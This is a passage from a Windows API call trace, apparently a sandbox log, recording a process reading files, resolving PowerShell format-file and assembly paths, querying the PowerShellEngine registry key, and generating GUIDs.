lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.492] GetLastError () returned 0x0 [0078.493] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.493] GetLastError () returned 0x0 [0078.493] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.493] GetLastError () returned 0x0 [0078.493] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.493] GetLastError () returned 0x0 [0078.494] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.494] GetLastError () returned 0x0 [0078.494] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.494] GetLastError () returned 0x0 [0078.494] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.494] GetLastError () returned 0x0 [0078.495] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.495] GetLastError () returned 0x0 [0078.495] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.495] GetLastError () returned 0x0 [0078.495] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.495] GetLastError () returned 0x0 [0078.496] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.496] GetLastError () returned 0x0 [0078.496] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.496] GetLastError () returned 0x0 [0078.496] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0xf37, lpOverlapped=0x0) returned 1 [0078.496] GetLastError () returned 0x0 [0078.496] ReadFile (in: hFile=0x310, lpBuffer=0x30506c7, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x30506c7*, lpNumberOfBytesRead=0xce2c4*=0x0, lpOverlapped=0x0) returned 1 [0078.496] GetLastError () returned 0x0 [0078.497] ReadFile (in: hFile=0x310, lpBuffer=0x3050ff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce2c4, lpOverlapped=0x0 | out: lpBuffer=0x3050ff0*, lpNumberOfBytesRead=0xce2c4*=0x0, lpOverlapped=0x0) returned 1 [0078.497] GetLastError () returned 0x0 [0078.497] CloseHandle (hObject=0x310) returned 1 [0078.497] GetLastError () returned 0x0 [0078.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcde24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0078.497] GetLastError () returned 0x0 [0078.497] SetErrorMode (uMode=0x1) returned 0x1 [0078.497] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", fInfoLevelId=0x0, lpFileInformation=0x3071fec | out: lpFileInformation=0x3071fec) returned 1 [0078.497] GetLastError () returned 0x0 [0078.497] SetErrorMode (uMode=0x1) returned 0x1 [0078.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0078.498] GetLastError () returned 0x0 [0078.498] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xce248 | out: phkResult=0xce248*=0x310) returned 0x0 [0078.498] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce290, lpData=0x0, lpcbData=0xce28c*=0x0 | out: lpType=0xce290*=0x1, lpData=0x0, lpcbData=0xce28c*=0x56) returned 0x0 [0078.498] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce290, lpData=0x2d1690, lpcbData=0xce28c*=0x56 | out: lpType=0xce290*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xce28c*=0x56) returned 0x0 [0078.499] RegCloseKey (hKey=0x310) returned 0x0 [0078.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0078.499] GetLastError () returned 0x0 [0078.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcdd84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0078.499] GetLastError () returned 0x0 [0078.523] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xf9cb7e98, Data2=0xdd6f, Data3=0x4687, Data4=([0]=0xba, [1]=0x74, [2]=0x95, [3]=0x57, [4]=0xcb, [5]=0x12, [6]=0x96, [7]=0x17))) returned 0x0 [0078.524] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xc691c5c6, Data2=0xd54a, Data3=0x456a, Data4=([0]=0x83, [1]=0x64, [2]=0x4, [3]=0xa, [4]=0x36, [5]=0x23, [6]=0x83, [7]=0x20))) returned 0x0 [0078.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.525] GetLastError () returned 0x0 [0078.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.525] GetLastError () returned 0x0 [0078.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.525] GetLastError () returned 0x0 [0078.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.525] GetLastError () returned 0x0 [0078.610] GetLastError () returned 0x0 [0078.610] GetLastError () returned 0x0 [0078.610] GetLastError () returned 0x0 [0078.610] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x25863e80, Data2=0xbb5, Data3=0x42a2, Data4=([0]=0x85, [1]=0x27, [2]=0xe6, [3]=0xa0, [4]=0xdf, [5]=0xca, [6]=0x1e, [7]=0x3c))) returned 0x0 [0078.667] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xf504bac0, Data2=0x7f80, Data3=0x488b, Data4=([0]=0xb7, [1]=0x1, [2]=0x8d, [3]=0x93, [4]=0x10, [5]=0xbe, [6]=0x76, [7]=0x4a))) returned 0x0 [0078.671] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x18ed6532, Data2=0x2ab2, Data3=0x495a, Data4=([0]=0xb4, [1]=0xe2, [2]=0x57, [3]=0xc3, [4]=0x9c, [5]=0x48, [6]=0x2b, [7]=0x4e))) returned 0x0 [0078.671] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x5cc10151, Data2=0x4eb8, Data3=0x4e2a, Data4=([0]=0xa3, [1]=0xdf, [2]=0x87, [3]=0xf1, [4]=0xdf, [5]=0xdd, [6]=0x66, [7]=0x44))) returned 0x0 [0078.680] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x10a955e0, Data2=0x5761, Data3=0x450f, Data4=([0]=0x85, [1]=0xc9, [2]=0x63, [3]=0xdb, [4]=0x80, [5]=0x17, [6]=0xe9, [7]=0x54))) returned 0x0 [0078.682] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xe9a0e83c, Data2=0xa05c, Data3=0x4fea, Data4=([0]=0x9a, [1]=0x5d, [2]=0x32, [3]=0x3b, [4]=0xbd, [5]=0xec, [6]=0x7e, [7]=0x6c))) returned 0x0 [0078.682] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x945127cd, Data2=0xd065, Data3=0x4086, Data4=([0]=0xa6, [1]=0x8e, [2]=0x39, [3]=0x6b, [4]=0xc5, [5]=0xd, [6]=0xcf, [7]=0x84))) returned 0x0 [0078.683] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xadecbfef, Data2=0xf28c, Data3=0x44d3, Data4=([0]=0x8c, [1]=0xb1, [2]=0x6d, [3]=0x7e, [4]=0x5e, [5]=0x61, [6]=0x70, [7]=0xcb))) returned 0x0 [0078.683] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xa9f4c457, Data2=0x78df, Data3=0x4cfc, Data4=([0]=0x9e, [1]=0xd2, [2]=0x19, [3]=0xc8, [4]=0x4b, [5]=0xa5, [6]=0xa3, [7]=0x5c))) returned 0x0 [0078.684] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xb257f37f, Data2=0x88ec, Data3=0x4b8f, Data4=([0]=0x89, [1]=0xb4, [2]=0x5d, [3]=0x83, [4]=0xf2, [5]=0x16, [6]=0x5, [7]=0xdc))) returned 0x0 [0078.684] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x2bbf7d22, Data2=0xd83e, Data3=0x435a, Data4=([0]=0xa8, [1]=0xb6, [2]=0xca, [3]=0x59, [4]=0xa2, [5]=0xc3, [6]=0x65, [7]=0xa9))) returned 0x0 [0078.687] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xe568aba2, Data2=0xea44, Data3=0x4ad8, Data4=([0]=0x8d, [1]=0x97, [2]=0xfc, [3]=0x97, [4]=0x3d, [5]=0x8, [6]=0x95, [7]=0x25))) returned 0x0 [0078.687] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x190d3c2a, Data2=0xaeb, Data3=0x4d71, Data4=([0]=0x92, [1]=0xdf, [2]=0x8e, [3]=0xa5, [4]=0xab, [5]=0x3c, [6]=0x23, [7]=0x8b))) returned 0x0 [0078.690] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xaa031ca9, Data2=0xb9f4, Data3=0x4fac, Data4=([0]=0x86, [1]=0x3e, [2]=0x8d, [3]=0x63, [4]=0x74, [5]=0x94, [6]=0x30, [7]=0xc0))) returned 0x0 [0078.693] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x4aa149e6, Data2=0x5abb, Data3=0x4a95, Data4=([0]=0xa1, [1]=0x7c, [2]=0xb5, [3]=0xd8, [4]=0x59, [5]=0xe1, [6]=0x97, [7]=0xc7))) returned 0x0 [0078.695] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x64ffbf8d, Data2=0x807e, Data3=0x4dfe, Data4=([0]=0x86, [1]=0x69, [2]=0x3d, [3]=0x81, [4]=0x28, [5]=0x96, [6]=0x4b, [7]=0xdb))) returned 0x0 [0078.695] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xe5cb57d7, Data2=0xeb80, Data3=0x4081, Data4=([0]=0xad, [1]=0x79, [2]=0xe5, [3]=0x80, [4]=0x53, [5]=0x3c, [6]=0x92, [7]=0x82))) returned 0x0 [0078.695] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xf4289ca5, Data2=0x6f59, Data3=0x415f, Data4=([0]=0xa0, [1]=0xba, [2]=0x8f, [3]=0xca, [4]=0xd6, [5]=0xff, [6]=0xc5, [7]=0xaa))) returned 0x0 [0078.696] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x1a1df2ea, Data2=0x8921, Data3=0x4e75, Data4=([0]=0x93, [1]=0x62, [2]=0x2d, [3]=0x56, [4]=0x36, [5]=0x9, [6]=0xd2, [7]=0x3e))) returned 0x0 [0078.697] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x5ecb168e, Data2=0x218, Data3=0x4123, Data4=([0]=0x9f, [1]=0x3b, [2]=0x1c, [3]=0xe6, [4]=0xce, [5]=0xcd, [6]=0x7d, [7]=0x38))) returned 0x0 [0078.697] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xaf8df6da, Data2=0xb688, Data3=0x4765, Data4=([0]=0xbf, [1]=0xc8, [2]=0xa5, [3]=0x4, [4]=0x5f, [5]=0xb6, [6]=0x74, [7]=0x6))) returned 0x0 [0078.697] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xe693ca14, Data2=0xd2fd, Data3=0x4103, Data4=([0]=0xb7, [1]=0x5c, [2]=0x51, [3]=0x18, [4]=0x24, [5]=0xab, [6]=0xcd, [7]=0x3c))) returned 0x0 [0078.698] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x4390c2a2, Data2=0x18df, Data3=0x4c18, Data4=([0]=0xb4, [1]=0xa, [2]=0x7a, [3]=0x63, [4]=0x54, [5]=0xbb, [6]=0x7b, [7]=0xa))) returned 0x0 [0078.713] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xce248 | out: phkResult=0xce248*=0x340) returned 0x0 [0078.713] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce290, lpData=0x0, lpcbData=0xce28c*=0x0 | out: lpType=0xce290*=0x1, lpData=0x0, lpcbData=0xce28c*=0x56) returned 0x0 [0078.713] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce290, lpData=0x2d1690, lpcbData=0xce28c*=0x56 | out: lpType=0xce290*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xce28c*=0x56) returned 0x0 [0078.713] RegCloseKey (hKey=0x340) returned 0x0 [0078.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0078.714] GetLastError () returned 0x0 [0078.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcdd84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0078.714] GetLastError () returned 0x0 [0078.717] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x2c4b8fc6, Data2=0x5c5d, Data3=0x4005, Data4=([0]=0xb7, [1]=0x93, [2]=0xf9, [3]=0x54, [4]=0x5c, [5]=0xec, [6]=0x2a, [7]=0xbe))) returned 0x0 [0078.717] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x17a90a81, Data2=0x1dd2, Data3=0x4c3d, Data4=([0]=0x94, [1]=0x28, [2]=0xe0, [3]=0x86, [4]=0x10, [5]=0x8e, [6]=0x9c, [7]=0xb4))) returned 0x0 [0078.718] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x50004e78, Data2=0x22e9, Data3=0x4973, Data4=([0]=0xa3, [1]=0xd, [2]=0xe0, [3]=0xb6, [4]=0x9f, [5]=0x0, [6]=0x3d, [7]=0xb1))) returned 0x0 [0078.718] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x5d4fd4ae, Data2=0x59e4, Data3=0x4f4a, Data4=([0]=0x81, [1]=0x3d, [2]=0x16, [3]=0x8f, [4]=0x96, [5]=0xab, [6]=0xaa, [7]=0x78))) returned 0x0 [0078.718] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xbe0f600c, Data2=0xe2a3, Data3=0x4f67, Data4=([0]=0x9f, [1]=0xf9, [2]=0x28, [3]=0xf6, [4]=0x3a, [5]=0xc4, [6]=0x3a, [7]=0xd9))) returned 0x0 [0078.718] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x652aa891, Data2=0x4b12, Data3=0x42fe, Data4=([0]=0x9c, [1]=0xc6, [2]=0xb0, [3]=0x39, [4]=0xeb, [5]=0x4d, [6]=0x1c, [7]=0x5d))) returned 0x0 [0078.719] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x48448d6a, Data2=0xcede, Data3=0x4134, Data4=([0]=0xa6, [1]=0x40, [2]=0x5b, [3]=0xeb, [4]=0x9, [5]=0xf, [6]=0x54, [7]=0x8f))) returned 0x0 [0078.719] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x3aa91fbe, Data2=0xa8bf, Data3=0x4fb4, Data4=([0]=0x82, [1]=0xc2, [2]=0x15, [3]=0x5c, [4]=0xf4, [5]=0x47, [6]=0xa3, [7]=0xc9))) returned 0x0 [0078.719] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xad7b4028, Data2=0x5202, Data3=0x4f99, Data4=([0]=0xa6, [1]=0xb9, [2]=0x57, [3]=0x34, [4]=0x17, [5]=0xa2, [6]=0xc0, [7]=0xaa))) returned 0x0 [0078.720] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x2eaa48a, Data2=0x56d2, Data3=0x437e, Data4=([0]=0x91, [1]=0x89, [2]=0x27, [3]=0xbd, [4]=0x9d, [5]=0x7c, [6]=0x69, [7]=0x24))) returned 0x0 [0078.720] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x78d1c03c, Data2=0x825b, Data3=0x4495, Data4=([0]=0x85, [1]=0x15, [2]=0x48, [3]=0x7c, [4]=0xa3, [5]=0xae, [6]=0xa8, [7]=0x99))) returned 0x0 [0078.728] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x8ddd715a, Data2=0xfa27, Data3=0x49de, Data4=([0]=0x9c, [1]=0x32, [2]=0xe7, [3]=0x1e, [4]=0x89, [5]=0x5a, [6]=0x22, [7]=0x6d))) returned 0x0 [0078.729] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x87cd8f81, Data2=0x65e6, Data3=0x4caa, Data4=([0]=0xb2, [1]=0xfe, [2]=0x54, [3]=0x97, [4]=0x61, [5]=0x2a, [6]=0x3a, [7]=0xad))) returned 0x0 [0078.729] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x13758da, Data2=0x443d, Data3=0x46ee, Data4=([0]=0xab, [1]=0x37, [2]=0x14, [3]=0xdb, [4]=0x3b, [5]=0xfe, [6]=0x22, [7]=0x5a))) returned 0x0 [0078.729] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xc8cb41f0, Data2=0x9ccd, Data3=0x4366, Data4=([0]=0x87, [1]=0x2, [2]=0x28, [3]=0xab, [4]=0x4b, [5]=0xf4, [6]=0xc1, [7]=0x20))) returned 0x0 [0078.730] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x90eb83be, Data2=0xa305, Data3=0x44f7, Data4=([0]=0xa0, [1]=0x4d, [2]=0xca, [3]=0x0, [4]=0xb4, [5]=0xc2, [6]=0x58, [7]=0x24))) returned 0x0 [0078.730] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x44a488d9, Data2=0xdca4, Data3=0x4d05, Data4=([0]=0x99, [1]=0xa3, [2]=0x68, [3]=0xe3, [4]=0xb8, [5]=0x77, [6]=0x9d, [7]=0x25))) returned 0x0 [0078.730] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x9235c588, Data2=0xd7c7, Data3=0x45f7, Data4=([0]=0x81, [1]=0x28, [2]=0x8, [3]=0x12, [4]=0x72, [5]=0xb9, [6]=0x79, [7]=0xa6))) returned 0x0 [0078.730] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xb26e80b7, Data2=0x8471, Data3=0x44ff, Data4=([0]=0xb6, [1]=0xea, [2]=0xec, [3]=0x7b, [4]=0x8a, [5]=0x3e, [6]=0x5, [7]=0xb9))) returned 0x0 [0078.731] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x373e6bdb, Data2=0x7626, Data3=0x4208, Data4=([0]=0x99, [1]=0x50, [2]=0xd, [3]=0xe2, [4]=0x0, [5]=0xa7, [6]=0x86, [7]=0xe2))) returned 0x0 [0078.731] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x9b386e63, Data2=0x602, Data3=0x4a8d, Data4=([0]=0x92, [1]=0x21, [2]=0x17, [3]=0xe2, [4]=0x24, [5]=0xbc, [6]=0x89, [7]=0xbc))) returned 0x0 [0078.732] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xb33b2ab, Data2=0x1ac3, Data3=0x4102, Data4=([0]=0x8a, [1]=0x6c, [2]=0x51, [3]=0x5e, [4]=0x77, [5]=0x64, [6]=0x8f, [7]=0x0))) returned 0x0 [0078.733] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x755220f1, Data2=0xb123, Data3=0x4ca6, Data4=([0]=0xad, [1]=0x4e, [2]=0x9, [3]=0xb9, [4]=0x57, [5]=0xc7, [6]=0x70, [7]=0x9b))) returned 0x0 [0078.733] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xba830c1a, Data2=0x1901, Data3=0x4fea, Data4=([0]=0xae, [1]=0xf6, [2]=0x45, [3]=0x2, [4]=0x95, [5]=0xe2, [6]=0x1f, [7]=0xab))) returned 0x0 [0078.733] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x266de058, Data2=0x2b4e, Data3=0x4101, Data4=([0]=0x99, [1]=0x99, [2]=0xc4, [3]=0x18, [4]=0x64, [5]=0x9d, [6]=0x9b, [7]=0x64))) returned 0x0 [0078.734] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xf0456641, Data2=0xde46, Data3=0x4b00, Data4=([0]=0xb7, [1]=0x2e, [2]=0xe9, [3]=0x8a, [4]=0x29, [5]=0xe0, [6]=0x9d, [7]=0x1d))) returned 0x0 [0078.734] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x66a1801b, Data2=0xf303, Data3=0x421a, Data4=([0]=0xbd, [1]=0xd1, [2]=0x2a, [3]=0x1e, [4]=0x2a, [5]=0x60, [6]=0xb, [7]=0x6b))) returned 0x0 [0078.734] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x96759b3c, Data2=0xc57, Data3=0x4a79, Data4=([0]=0x8e, [1]=0x3a, [2]=0x1a, [3]=0x51, [4]=0x47, [5]=0x2d, [6]=0x39, [7]=0xc6))) returned 0x0 [0078.734] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x868cab18, Data2=0x80ae, Data3=0x4a29, Data4=([0]=0xbc, [1]=0x6c, [2]=0x3b, [3]=0x57, [4]=0x4b, [5]=0xd7, [6]=0xbd, [7]=0x43))) returned 0x0 [0078.734] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x3f9513c3, Data2=0xaf38, Data3=0x4337, Data4=([0]=0x87, [1]=0xa2, [2]=0x17, [3]=0x6b, [4]=0xde, [5]=0xb3, [6]=0xc4, [7]=0x62))) returned 0x0 [0078.735] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x1dfa60d2, Data2=0x4792, Data3=0x41f1, Data4=([0]=0xa6, [1]=0xb1, [2]=0xa4, [3]=0xf6, [4]=0x93, [5]=0x74, [6]=0x44, [7]=0x74))) returned 0x0 [0078.735] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x4ce99fdf, Data2=0xfb6b, Data3=0x4bcd, Data4=([0]=0xa7, [1]=0x38, [2]=0x48, [3]=0x6f, [4]=0x1e, [5]=0x97, [6]=0xb2, [7]=0x63))) returned 0x0 [0078.735] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0x4ca813ab, Data2=0xa81e, Data3=0x4028, Data4=([0]=0x8b, [1]=0xd6, [2]=0x39, [3]=0x1d, [4]=0xb0, [5]=0xbe, [6]=0x8a, [7]=0xb8))) returned 0x0 [0078.738] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xbf7b3850, Data2=0x47ca, Data3=0x4cea, Data4=([0]=0x94, [1]=0xb7, [2]=0xe4, [3]=0x69, [4]=0xe8, [5]=0xba, [6]=0x3b, [7]=0x80))) returned 0x0 [0078.738] CoCreateGuid (in: pguid=0xce2b8 | out: pguid=0xce2b8*(Data1=0xdb3e5d5f, 